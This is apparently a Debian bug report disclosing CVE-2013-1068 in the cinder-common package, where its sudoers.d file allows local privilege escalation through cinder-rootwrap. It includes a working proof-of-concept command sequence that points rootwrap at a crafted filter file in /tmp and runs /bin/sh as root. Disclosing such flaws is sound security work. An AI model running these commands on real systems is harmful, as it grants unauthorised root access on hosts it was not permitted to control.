Package: cinder-common Version: 2014.1.1-2 Severity: grave Tags: security, confirmed
After installing cinder-common file /etc/sudoers.d/cinder-common is created. If /etc/sudoers contains "#includedir /etc/sudoers.d" cinder is vulnerable to CVE-2013-1068 local privilege escalation. Vulnerability does not need working OpenStack installation. If I am correct OpenStack does not work without includedir configuration so it might be usually enabled in OpenStack instances. PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019 """ echo [DEFAULT] >/tmp/my-rootwrap.conf echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf mkdir /tmp/my-filters.d echo [Filters] >/tmp/my-filters.d/my.filters echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id """ --- Henri Salo
signature.asc
Description: Digital signature
